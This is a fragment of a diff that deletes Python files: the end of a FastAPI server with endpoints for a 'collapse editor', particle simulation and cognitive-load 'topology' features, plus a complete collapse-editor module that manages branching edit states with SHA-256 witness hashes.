|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.get("/api/collapse-editor/witnesses")
|
|
||||||
def get_witness_history():
|
|
||||||
"""Get all witness records"""
|
|
||||||
global collapse_editor
|
|
||||||
|
|
||||||
try:
|
|
||||||
witnesses = collapse_editor.get_witness_history()
|
|
||||||
|
|
||||||
return {
|
|
||||||
"witnesses": [
|
|
||||||
{
|
|
||||||
"witness_hash": w.witness_hash,
|
|
||||||
"superposition_id": w.superposition_id,
|
|
||||||
"collapsed_branch_id": w.collapsed_branch_id,
|
|
||||||
"timestamp": w.timestamp.isoformat()
|
|
||||||
}
|
|
||||||
for w in witnesses
|
|
||||||
],
|
|
||||||
"count": len(witnesses)
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/particle/create")
|
|
||||||
def create_particle(request: CreateParticleRequest):
|
|
||||||
"""Create new particle"""
|
|
||||||
global particle_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
particle_type = ParticleType[request.particle_type.upper()]
|
|
||||||
particle = particle_engine.create_particle(
|
|
||||||
particle_type,
|
|
||||||
request.position,
|
|
||||||
request.velocity
|
|
||||||
)
|
|
||||||
|
|
||||||
return particle.to_dict()
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/particle/emit-photon")
|
|
||||||
def emit_photon(request: EmitPhotonRequest):
|
|
||||||
"""Emit photon from one particle to another"""
|
|
||||||
global particle_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
interaction = particle_engine.emit_photon(request.from_particle_id, request.to_particle_id)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"interaction_id": len(particle_engine.interactions),
|
|
||||||
"from_particle_id": interaction.from_particle_id,
|
|
||||||
"to_particle_id": interaction.to_particle_id,
|
|
||||||
"interaction_type": interaction.interaction_type,
|
|
||||||
"energy_transfer": interaction.energy_transfer
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/particle/absorb-photon")
|
|
||||||
def absorb_photon(request: AbsorbPhotonRequest):
|
|
||||||
"""Absorb photon by target particle"""
|
|
||||||
global particle_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
interaction = particle_engine.absorb_photon(request.photon_id, request.target_particle_id)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"interaction_id": len(particle_engine.interactions),
|
|
||||||
"from_particle_id": interaction.from_particle_id,
|
|
||||||
"to_particle_id": interaction.to_particle_id,
|
|
||||||
"interaction_type": interaction.interaction_type,
|
|
||||||
"energy_transfer": interaction.energy_transfer
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/particle/detect-neutrino/{particle_id}")
|
|
||||||
def detect_neutrino(particle_id: str):
|
|
||||||
"""Attempt to detect neutrino (weakly-interacting inference)"""
|
|
||||||
global particle_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
detected = particle_engine.detect_neutrino(particle_id)
|
|
||||||
|
|
||||||
return {"detected": detected}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/particle/update")
|
|
||||||
def update_particles():
|
|
||||||
"""Update particle positions and velocities"""
|
|
||||||
global particle_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
particle_engine.update()
|
|
||||||
|
|
||||||
return {"time": particle_engine.time}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.get("/api/particle/conservation")
|
|
||||||
def check_conservation():
|
|
||||||
"""Check all conservation laws"""
|
|
||||||
global particle_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
conservation = particle_engine.check_conservation()
|
|
||||||
return conservation
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.get("/api/particle/graph")
|
|
||||||
def get_interaction_graph():
|
|
||||||
"""Get interaction graph for visualization"""
|
|
||||||
global particle_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
graph = particle_engine.get_interaction_graph()
|
|
||||||
return graph
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.get("/api/particle/type/{particle_type}")
|
|
||||||
def get_particles_by_type(particle_type: str):
|
|
||||||
"""Get all particles of specific type"""
|
|
||||||
global particle_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
ptype = ParticleType[particle_type.upper()]
|
|
||||||
particles = particle_engine.get_particles_by_type(ptype)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"particles": [p.to_dict() for p in particles],
|
|
||||||
"count": len(particles)
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/self-typing/record-interaction")
|
|
||||||
def record_interaction(request: RecordInteractionRequest):
|
|
||||||
"""Record interaction between layers"""
|
|
||||||
global self_typing_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
interaction_type = InteractionType[request.interaction_type.upper()]
|
|
||||||
interaction = self_typing_engine.record_interaction(
|
|
||||||
interaction_type,
|
|
||||||
request.source_layer,
|
|
||||||
request.target_layer,
|
|
||||||
request.context
|
|
||||||
)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"interaction_id": interaction.interaction_id,
|
|
||||||
"interaction_type": interaction.interaction_type.value,
|
|
||||||
"source_layer": interaction.source_layer,
|
|
||||||
"target_layer": interaction.target_layer,
|
|
||||||
"timestamp": interaction.timestamp.isoformat()
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/self-typing/infer-metatype")
|
|
||||||
def infer_metatype(request: InferMetatypeRequest):
|
|
||||||
"""Infer metatype from interaction patterns"""
|
|
||||||
global self_typing_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
metatype = self_typing_engine.infer_metatype(request.context)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"metatype_id": metatype.metatype_id,
|
|
||||||
"type_signature": metatype.type_signature,
|
|
||||||
"confidence": metatype.confidence,
|
|
||||||
"suggestions": metatype.suggestions,
|
|
||||||
"created_at": metatype.created_at.isoformat()
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.get("/api/self-typing/interactions")
|
|
||||||
def get_interaction_history(limit: int = 100):
|
|
||||||
"""Get recent interaction history"""
|
|
||||||
global self_typing_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
interactions = self_typing_engine.get_interaction_history(limit)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"interactions": [
|
|
||||||
{
|
|
||||||
"interaction_id": i.interaction_id,
|
|
||||||
"interaction_type": i.interaction_type.value,
|
|
||||||
"source_layer": i.source_layer,
|
|
||||||
"target_layer": i.target_layer,
|
|
||||||
"timestamp": i.timestamp.isoformat()
|
|
||||||
}
|
|
||||||
for i in interactions
|
|
||||||
],
|
|
||||||
"count": len(interactions)
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.get("/api/self-typing/statistics")
|
|
||||||
def get_type_statistics():
|
|
||||||
"""Get statistics about type inference"""
|
|
||||||
global self_typing_engine
|
|
||||||
|
|
||||||
try:
|
|
||||||
stats = self_typing_engine.get_type_statistics()
|
|
||||||
return stats
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/relativity/measure-cognitive-load")
|
|
||||||
def measure_cognitive_load(request: MeasureCognitiveLoadRequest):
|
|
||||||
"""Measure cognitive load"""
|
|
||||||
global relativity_adapter
|
|
||||||
|
|
||||||
try:
|
|
||||||
load_vector = relativity_adapter.measure_cognitive_load(
|
|
||||||
request.information_density,
|
|
||||||
request.complexity,
|
|
||||||
request.novelty,
|
|
||||||
request.uncertainty
|
|
||||||
)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"level": load_vector.get_level().value,
|
|
||||||
"information_density": load_vector.information_density,
|
|
||||||
"complexity": load_vector.complexity,
|
|
||||||
"novelty": load_vector.novelty,
|
|
||||||
"uncertainty": load_vector.uncertainty,
|
|
||||||
"timestamp": load_vector.timestamp
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/relativity/adapt-topology")
|
|
||||||
def adapt_topology(request: MeasureCognitiveLoadRequest):
|
|
||||||
"""Adapt topology based on cognitive load"""
|
|
||||||
global relativity_adapter
|
|
||||||
|
|
||||||
try:
|
|
||||||
load_vector = relativity_adapter.measure_cognitive_load(
|
|
||||||
request.information_density,
|
|
||||||
request.complexity,
|
|
||||||
request.novelty,
|
|
||||||
request.uncertainty
|
|
||||||
)
|
|
||||||
|
|
||||||
topology = relativity_adapter.adapt_topology(load_vector)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"topology_id": topology.topology_id,
|
|
||||||
"distance_metric": topology.distance_metric,
|
|
||||||
"cognitive_load_level": topology.cognitive_load_level.value
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/relativity/transform")
|
|
||||||
def transform_coordinates(request: TransformRequest):
|
|
||||||
"""Transform coordinates between topologies"""
|
|
||||||
global relativity_adapter
|
|
||||||
|
|
||||||
try:
|
|
||||||
input_vector = np.array(request.input_vector, dtype=np.float32)
|
|
||||||
transformed = relativity_adapter.transform(
|
|
||||||
input_vector,
|
|
||||||
request.from_topology,
|
|
||||||
request.to_topology
|
|
||||||
)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"transformed_vector": transformed.tolist(),
|
|
||||||
"from_topology": request.from_topology,
|
|
||||||
"to_topology": request.to_topology
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.post("/api/relativity/enable-dolphin-mode")
|
|
||||||
def enable_dolphin_mode():
|
|
||||||
"""Enable dolphin mode (non-Euclidean visualization)"""
|
|
||||||
global relativity_adapter
|
|
||||||
|
|
||||||
try:
|
|
||||||
relativity_adapter.enable_dolphin_mode()
|
|
||||||
|
|
||||||
return {
|
|
||||||
"status": "dolphin_mode_enabled",
|
|
||||||
"current_topology": relativity_adapter.current_topology.topology_id if relativity_adapter.current_topology else None
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.get("/api/relativity/cognitive-load-history")
|
|
||||||
def get_cognitive_load_history(limit: int = 100):
|
|
||||||
"""Get cognitive load history"""
|
|
||||||
global relativity_adapter
|
|
||||||
|
|
||||||
try:
|
|
||||||
history = relativity_adapter.get_cognitive_load_history(limit)
|
|
||||||
|
|
||||||
return {
|
|
||||||
"history": [
|
|
||||||
{
|
|
||||||
"level": h.get_level().value,
|
|
||||||
"information_density": h.information_density,
|
|
||||||
"complexity": h.complexity,
|
|
||||||
"novelty": h.novelty,
|
|
||||||
"uncertainty": h.uncertainty,
|
|
||||||
"timestamp": h.timestamp
|
|
||||||
}
|
|
||||||
for h in history
|
|
||||||
],
|
|
||||||
"count": len(history)
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.get("/api/relativity/statistics")
|
|
||||||
def get_topology_statistics():
|
|
||||||
"""Get topology statistics"""
|
|
||||||
global relativity_adapter
|
|
||||||
|
|
||||||
try:
|
|
||||||
stats = relativity_adapter.get_topology_statistics()
|
|
||||||
return stats
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
@app.get("/api/stats")
|
|
||||||
def get_stats():
|
|
||||||
"""Get database statistics"""
|
|
||||||
try:
|
|
||||||
conn = get_db_connection()
|
|
||||||
cursor = conn.cursor()
|
|
||||||
|
|
||||||
# Count total packages
|
|
||||||
cursor.execute("SELECT COUNT(*) as count FROM packages")
|
|
||||||
total_count = cursor.fetchone()['count']
|
|
||||||
|
|
||||||
# Count packages with concept vectors
|
|
||||||
cursor.execute("SELECT COUNT(*) as count FROM packages WHERE concept_vector_14 IS NOT NULL")
|
|
||||||
vector_count = cursor.fetchone()['count']
|
|
||||||
|
|
||||||
conn.close()
|
|
||||||
|
|
||||||
return {
|
|
||||||
"total_packages": total_count,
|
|
||||||
"packages_with_vectors": vector_count,
|
|
||||||
"coverage": vector_count / total_count if total_count > 0 else 0
|
|
||||||
}
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
raise HTTPException(status_code=500, detail=str(e))
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
import uvicorn
|
|
||||||
|
|
||||||
print("Starting Manifold Surface API Server...")
|
|
||||||
print(f"Database: {DB_PATH}")
|
|
||||||
|
|
||||||
uvicorn.run(app, host="0.0.0.0", port=8000)
|
|
||||||
|
|
@ -1,408 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Collapse Editor — Superposition State Management
|
|
||||||
First-Principles Derivation: Save is projection collapse from hidden path to observable state
|
|
||||||
|
|
||||||
Performance Targets:
|
|
||||||
- < 10ms collapse operation
|
|
||||||
- < 5ms branch visualization
|
|
||||||
- < 20ms undo operation
|
|
||||||
"""
|
|
||||||
|
|
||||||
import numpy as np
|
|
||||||
from typing import List, Optional, Dict
|
|
||||||
from dataclasses import dataclass, field
|
|
||||||
from enum import Enum
|
|
||||||
import json
|
|
||||||
import hashlib
|
|
||||||
from datetime import datetime
|
|
||||||
|
|
||||||
|
|
||||||
class StateType(Enum):
|
|
||||||
"""Type of state in superposition"""
|
|
||||||
TEXT = "text"
|
|
||||||
VECTOR = "vector"
|
|
||||||
STRUCTURED = "structured"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class State:
|
|
||||||
"""Single state in superposition"""
|
|
||||||
content: str # State content (JSON serialized)
|
|
||||||
state_type: StateType
|
|
||||||
amplitude: float # Quantum amplitude (probability amplitude)
|
|
||||||
created_at: datetime = field(default_factory=datetime.now)
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"State(type={self.state_type.value}, amplitude={self.amplitude:.3f})"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class ObservableState:
|
|
||||||
"""Collapsed observable state (eigenstate)"""
|
|
||||||
archive_id: str
|
|
||||||
content: str # Observable content
|
|
||||||
witness_hash: str # SHA-256 hash of content
|
|
||||||
collapsed_at: datetime = field(default_factory=datetime.now)
|
|
||||||
parent_superposition_id: Optional[str] = None
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"ObservableState(archive_id={self.archive_id}, hash={self.witness_hash[:8]}...)"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class Branch:
|
|
||||||
"""Branch in superposition (possible trajectory)"""
|
|
||||||
branch_id: str
|
|
||||||
states: List[State]
|
|
||||||
amplitude: float # Branch amplitude
|
|
||||||
parent_branch_id: Optional[str] = None
|
|
||||||
created_at: datetime = field(default_factory=datetime.now)
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"Branch(id={self.branch_id}, states={len(self.states)}, amplitude={self.amplitude:.3f})"
|
|
||||||
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class Superposition:
|
|
||||||
"""Superposition of possible states"""
|
|
||||||
superposition_id: str
|
|
||||||
branches: List[Branch]
|
|
||||||
current_branch_id: Optional[str] = None
|
|
||||||
created_at: datetime = field(default_factory=datetime.now)
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"Superposition(id={self.superposition_id}, branches={len(self.branches)})"
|
|
||||||
|
|
||||||
def get_current_branch(self) -> Optional[Branch]:
|
|
||||||
"""Get currently active branch"""
|
|
||||||
if self.current_branch_id is None:
|
|
||||||
return None
|
|
||||||
for branch in self.branches:
|
|
||||||
if branch.branch_id == self.current_branch_id:
|
|
||||||
return branch
|
|
||||||
return None
|
|
||||||
|
|
||||||
def get_total_amplitude(self) -> float:
|
|
||||||
"""Get total amplitude (sum of branch amplitudes)"""
|
|
||||||
return sum(branch.amplitude for branch in self.branches)
|
|
||||||
|
|
||||||
def normalize_amplitudes(self) -> None:
|
|
||||||
"""Normalize branch amplitudes to sum to 1.0"""
|
|
||||||
total = self.get_total_amplitude()
|
|
||||||
if total > 0:
|
|
||||||
for branch in self.branches:
|
|
||||||
branch.amplitude /= total
|
|
||||||
|
|
||||||
|
|
||||||
class Witness:
|
|
||||||
"""Witness record for collapse operation"""
|
|
||||||
witness_hash: str
|
|
||||||
superposition_id: str
|
|
||||||
collapsed_branch_id: str
|
|
||||||
observable_state: ObservableState
|
|
||||||
timestamp: datetime
|
|
||||||
|
|
||||||
def __init__(self, superposition_id: str, collapsed_branch_id: str, observable_state: ObservableState):
|
|
||||||
self.superposition_id = superposition_id
|
|
||||||
self.collapsed_branch_id = collapsed_branch_id
|
|
||||||
self.observable_state = observable_state
|
|
||||||
self.timestamp = datetime.now()
|
|
||||||
|
|
||||||
# Compute witness hash
|
|
||||||
witness_data = f"{superposition_id}:{collapsed_branch_id}:{observable_state.witness_hash}:{self.timestamp.isoformat()}"
|
|
||||||
self.witness_hash = hashlib.sha256(witness_data.encode()).hexdigest()
|
|
||||||
|
|
||||||
def __repr__(self) -> str:
|
|
||||||
return f"Witness(hash={self.witness_hash[:8]}..., superposition={self.superposition_id})"
|
|
||||||
|
|
||||||
|
|
||||||
class CollapseEditor:
|
|
||||||
"""
|
|
||||||
Collapse Editor — Superposition State Management
|
|
||||||
|
|
||||||
Edit in superposition, save as collapse to observable state
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.superpositions: Dict[str, Superposition] = {}
|
|
||||||
self.observable_states: Dict[str, ObservableState] = {}
|
|
||||||
self.witnesses: List[Witness] = []
|
|
||||||
self.undo_stack: List[ObservableState] = []
|
|
||||||
self.superposition_counter = 0
|
|
||||||
self.branch_counter = 0
|
|
||||||
|
|
||||||
def create_superposition(self, initial_content: str, state_type: StateType = StateType.TEXT) -> Superposition:
|
|
||||||
"""
|
|
||||||
Create new superposition with single branch
|
|
||||||
|
|
||||||
Args:
|
|
||||||
initial_content: Initial content
|
|
||||||
state_type: Type of state
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
New superposition
|
|
||||||
"""
|
|
||||||
self.superposition_counter += 1
|
|
||||||
superposition_id = f"superposition_{self.superposition_counter}"
|
|
||||||
|
|
||||||
# Create initial state
|
|
||||||
initial_state = State(
|
|
||||||
content=initial_content,
|
|
||||||
state_type=state_type,
|
|
||||||
amplitude=1.0
|
|
||||||
)
|
|
||||||
|
|
||||||
# Create initial branch
|
|
||||||
self.branch_counter += 1
|
|
||||||
branch_id = f"branch_{self.branch_counter}"
|
|
||||||
branch = Branch(
|
|
||||||
branch_id=branch_id,
|
|
||||||
states=[initial_state],
|
|
||||||
amplitude=1.0
|
|
||||||
)
|
|
||||||
|
|
||||||
# Create superposition
|
|
||||||
superposition = Superposition(
|
|
||||||
superposition_id=superposition_id,
|
|
||||||
branches=[branch],
|
|
||||||
current_branch_id=branch_id
|
|
||||||
)
|
|
||||||
|
|
||||||
self.superpositions[superposition_id] = superposition
|
|
||||||
return superposition
|
|
||||||
|
|
||||||
def add_state_to_branch(self, superposition_id: str, branch_id: str, content: str, state_type: StateType = StateType.TEXT) -> None:
|
|
||||||
"""
|
|
||||||
Add new state to existing branch (creates superposition)
|
|
||||||
|
|
||||||
Args:
|
|
||||||
superposition_id: Superposition ID
|
|
||||||
branch_id: Branch ID
|
|
||||||
content: State content
|
|
||||||
state_type: Type of state
|
|
||||||
"""
|
|
||||||
if superposition_id not in self.superpositions:
|
|
||||||
raise ValueError(f"Superposition {superposition_id} not found")
|
|
||||||
|
|
||||||
superposition = self.superpositions[superposition_id]
|
|
||||||
branch = None
|
|
||||||
for b in superposition.branches:
|
|
||||||
if b.branch_id == branch_id:
|
|
||||||
branch = b
|
|
||||||
break
|
|
||||||
|
|
||||||
if branch is None:
|
|
||||||
raise ValueError(f"Branch {branch_id} not found")
|
|
||||||
|
|
||||||
# Add new state to branch
|
|
||||||
new_state = State(
|
|
||||||
content=content,
|
|
||||||
state_type=state_type,
|
|
||||||
amplitude=1.0
|
|
||||||
)
|
|
||||||
branch.states.append(new_state)
|
|
||||||
|
|
||||||
def create_branch(self, superposition_id: str, parent_branch_id: Optional[str] = None, content: str = "", state_type: StateType = StateType.TEXT) -> Branch:
|
|
||||||
"""
|
|
||||||
Create new branch in superposition
|
|
||||||
|
|
||||||
Args:
|
|
||||||
superposition_id: Superposition ID
|
|
||||||
parent_branch_id: Parent branch ID (optional)
|
|
||||||
content: Initial content for new branch
|
|
||||||
state_type: Type of state
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
New branch
|
|
||||||
"""
|
|
||||||
if superposition_id not in self.superpositions:
|
|
||||||
raise ValueError(f"Superposition {superposition_id} not found")
|
|
||||||
|
|
||||||
superposition = self.superpositions[superposition_id]
|
|
||||||
|
|
||||||
# Create initial state
|
|
||||||
initial_state = State(
|
|
||||||
content=content,
|
|
||||||
state_type=state_type,
|
|
||||||
amplitude=1.0
|
|
||||||
)
|
|
||||||
|
|
||||||
# Create new branch
|
|
||||||
self.branch_counter += 1
|
|
||||||
branch_id = f"branch_{self.branch_counter}"
|
|
||||||
branch = Branch(
|
|
||||||
branch_id=branch_id,
|
|
||||||
states=[initial_state],
|
|
||||||
amplitude=1.0,
|
|
||||||
parent_branch_id=parent_branch_id
|
|
||||||
)
|
|
||||||
|
|
||||||
superposition.branches.append(branch)
|
|
||||||
superposition.normalize_amplitudes()
|
|
||||||
|
|
||||||
return branch
|
|
||||||
|
|
||||||
def collapse(self, superposition_id: str, branch_id: str) -> ObservableState:
|
|
||||||
"""
|
|
||||||
Collapse superposition to observable state
|
|
||||||
|
|
||||||
Args:
|
|
||||||
superposition_id: Superposition ID
|
|
||||||
branch_id: Branch ID to collapse to
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Observable state (eigenstate)
|
|
||||||
"""
|
|
||||||
if superposition_id not in self.superpositions:
|
|
||||||
raise ValueError(f"Superposition {superposition_id} not found")
|
|
||||||
|
|
||||||
superposition = self.superpositions[superposition_id]
|
|
||||||
|
|
||||||
# Find branch
|
|
||||||
branch = None
|
|
||||||
for b in superposition.branches:
|
|
||||||
if b.branch_id == branch_id:
|
|
||||||
branch = b
|
|
||||||
break
|
|
||||||
|
|
||||||
if branch is None:
|
|
||||||
raise ValueError(f"Branch {branch_id} not found")
|
|
||||||
|
|
||||||
# Get final state from branch
|
|
||||||
if not branch.states:
|
|
||||||
raise ValueError(f"Branch {branch_id} has no states")
|
|
||||||
|
|
||||||
final_state = branch.states[-1]
|
|
||||||
|
|
||||||
# Create observable state
|
|
||||||
archive_id = f"observable_{hashlib.sha256(final_state.content.encode()).hexdigest()[:16]}"
|
|
||||||
witness_hash = hashlib.sha256(final_state.content.encode()).hexdigest()
|
|
||||||
|
|
||||||
observable_state = ObservableState(
|
|
||||||
archive_id=archive_id,
|
|
||||||
content=final_state.content,
|
|
||||||
witness_hash=witness_hash,
|
|
||||||
parent_superposition_id=superposition_id
|
|
||||||
)
|
|
||||||
|
|
||||||
# Record witness
|
|
||||||
witness = Witness(superposition_id, branch_id, observable_state)
|
|
||||||
self.witnesses.append(witness)
|
|
||||||
|
|
||||||
# Store observable state
|
|
||||||
self.observable_states[archive_id] = observable_state
|
|
||||||
|
|
||||||
# Add to undo stack
|
|
||||||
self.undo_stack.append(observable_state)
|
|
||||||
|
|
||||||
# Remove superposition (collapsed)
|
|
||||||
del self.superpositions[superposition_id]
|
|
||||||
|
|
||||||
return observable_state
|
|
||||||
|
|
||||||
def undo(self) -> Optional[ObservableState]:
|
|
||||||
"""
|
|
||||||
Revert to previous observable state
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Previous observable state if available
|
|
||||||
"""
|
|
||||||
if not self.undo_stack:
|
|
||||||
return None
|
|
||||||
|
|
||||||
# Pop from undo stack
|
|
||||||
previous_state = self.undo_stack.pop()
|
|
||||||
|
|
||||||
# Restore to undo stack (for redo)
|
|
||||||
# In full implementation, would need redo stack
|
|
||||||
|
|
||||||
return previous_state
|
|
||||||
|
|
||||||
def get_branches(self, superposition_id: str) -> List[Branch]:
|
|
||||||
"""Get all branches for superposition"""
|
|
||||||
if superposition_id not in self.superpositions:
|
|
||||||
return []
|
|
||||||
|
|
||||||
return self.superpositions[superposition_id].branches
|
|
||||||
|
|
||||||
def get_branch_tree(self, superposition_id: str) -> Dict:
|
|
||||||
"""
|
|
||||||
Get branch tree structure for visualization
|
|
||||||
|
|
||||||
Args:
|
|
||||||
superposition_id: Superposition ID
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Tree structure as nested dict
|
|
||||||
"""
|
|
||||||
if superposition_id not in self.superpositions:
|
|
||||||
return {}
|
|
||||||
|
|
||||||
superposition = self.superpositions[superposition_id]
|
|
||||||
|
|
||||||
# Build tree from parent relationships
|
|
||||||
tree = {}
|
|
||||||
branch_map = {b.branch_id: b for b in superposition.branches}
|
|
||||||
|
|
||||||
for branch in superposition.branches:
|
|
||||||
if branch.parent_branch_id is None:
|
|
||||||
tree[branch.branch_id] = self._build_subtree(branch, branch_map)
|
|
||||||
|
|
||||||
return tree
|
|
||||||
|
|
||||||
def _build_subtree(self, branch: Branch, branch_map: Dict[str, Branch]) -> Dict:
|
|
||||||
"""Build subtree for branch visualization"""
|
|
||||||
subtree = {
|
|
||||||
"branch_id": branch.branch_id,
|
|
||||||
"amplitude": branch.amplitude,
|
|
||||||
"states": len(branch.states),
|
|
||||||
"children": []
|
|
||||||
}
|
|
||||||
|
|
||||||
# Find children
|
|
||||||
for b in branch_map.values():
|
|
||||||
if b.parent_branch_id == branch.branch_id:
|
|
||||||
subtree["children"].append(self._build_subtree(b, branch_map))
|
|
||||||
|
|
||||||
return subtree
|
|
||||||
|
|
||||||
def get_witness_history(self) -> List[Witness]:
|
|
||||||
"""Get all witness records"""
|
|
||||||
return self.witnesses
|
|
||||||
|
|
||||||
|
|
||||||
def main():
|
|
||||||
"""Test collapse editor with sample data"""
|
|
||||||
editor = CollapseEditor()
|
|
||||||
|
|
||||||
# Create superposition
|
|
||||||
superposition = editor.create_superposition("Initial content", StateType.TEXT)
|
|
||||||
print(f"Created superposition: {superposition}")
|
|
||||||
|
|
||||||
# Add state to current branch
|
|
||||||
current_branch = superposition.get_current_branch()
|
|
||||||
editor.add_state_to_branch(superposition.superposition_id, current_branch.branch_id, "Modified content")
|
|
||||||
print(f"Added state to branch: {current_branch}")
|
|
||||||
|
|
||||||
# Create new branch
|
|
||||||
new_branch = editor.create_branch(superposition.superposition_id, current_branch.branch_id, "Alternative content")
|
|
||||||
print(f"Created new branch: {new_branch}")
|
|
||||||
|
|
||||||
# Get branch tree
|
|
||||||
tree = editor.get_branch_tree(superposition.superposition_id)
|
|
||||||
print(f"Branch tree: {json.dumps(tree, indent=2)}")
|
|
||||||
|
|
||||||
# Collapse to first branch
|
|
||||||
observable = editor.collapse(superposition.superposition_id, current_branch.branch_id)
|
|
||||||
print(f"Collapsed to observable: {observable}")
|
|
||||||
|
|
||||||
# Check witness history
|
|
||||||
witnesses = editor.get_witness_history()
|
|
||||||
print(f"Witness history: {len(witnesses)} witnesses")
|
|
||||||
for w in witnesses:
|
|
||||||
print(f" {w}")
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
main()
|
|
||||||
|
|
@ -1,389 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Particle Interaction — Standard Model Particle Visualization
|
|
||||||
First-Principles Derivation: Standard Model particles as semantic atoms
|
|
||||||
|
|
||||||
Performance Targets:
|
|
||||||
- 1000+ particles real-time simulation
|
|
||||||
- < 16ms interaction update (60 FPS)
|
|
||||||
- < 1ms conservation check
|
|
||||||
|
|
||||||
Particle Types:
|
|
||||||
- Electron = unit of charge / lepton number (information carrier)
|
|
||||||
- Photon = unit of information transfer (messenger)
|
|
||||||
- Proton/Neutron = stable semantic nuclei (baryon conservation = truth)
|
|
||||||
- Neutrino = weakly-interacting inference (hard to detect)
|
|
||||||
"""
|
|
||||||
|
|
||||||
